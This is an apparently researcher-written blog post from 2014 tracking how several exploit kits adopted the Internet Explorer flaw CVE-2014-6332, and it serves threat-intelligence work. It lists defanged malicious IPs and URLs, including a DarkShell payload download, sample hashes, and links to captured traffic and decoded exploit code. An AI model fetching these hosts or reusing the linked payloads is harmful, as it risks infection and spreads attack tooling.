2014-11-21 - Exploit Integration

CVE-2014-6332 (Internet Explorer) and Exploits Kits

For this CVE referer to :

The first encounter I had with this CVE in exploit kit, was in the Sweet Orange from the actor pushing DarkShell via KR compromised website. The landing provided by @MalwareSigs the 2014-11-19 was already containing CVE-2014-6332

So this actor :
DarkShell pushed by Da Gong  CK VIP  (cf comments) via CVE-2014-0515
that we saw moving to Sweet Orange :

Sweet Orange :

The URL pattern are different, but at a given time the modifications are similar on both...

Da Orangade firing CVE-2014-6332 and DarkShell Call back
GET http://98.126.249 .92:82/index.html
200 OK (text/html)

Sweet Orange Landing
A replace then a b64decode on the second b64 blob and we have :

CVE-2014-6332 in Sweet Orange
GET http://v.krtedun .com/sum.exe - DarkShell - fc1a3c9fc7a80e80109f1e2a32e2b057
200 OK (application/octet-stream)

Here a more "standard" Sweet Orange :

CVE-2014-6332 fired by Sweet Orange - And Betabot call back.
File :  You'll find a PCAP illustrating this here 
http://www.threatglass.com/serve_pcap/498fe35b94145153f51c51f66abe42af/20141121 from 
http://www.threatglass.com/malicious_urls/volumebass-com-2014-11-21 (in this pcap the CVE-2014-6332 is in the first b64 blob)

Neutrino :

Neutrino Firing CVE-2014-6332 embedded in a flash

Please refer to this post : Neutrino : The come back !

Archie :

First spotted by Will Metcalf, here CVE-2014-6332 in Archie

CVE-2014-6332 - 2014-11-24
Decoded b64 here http://pastebin.com/EhpdrZvy
Fiddler here

Flash EK

Flash EK firing CVE-2014-6332 - 2014-12-13
Edit : 2014-12-21 - Kaspersky named what we were calling Andromedins or AndroKins : Chthonic
Sample : 1d9b286ff22a99dd7087f0e48e1deb4f

Fiddler Here

NB : it's in RIG and Angler (2015-01-30 for last one).
Will update asap.

Read More :

Neutrino : The come back ! - 2014-11-20
IBM X-Force Researcher Finds Significant Vulnerability in Microsoft Windows - 2014-11-11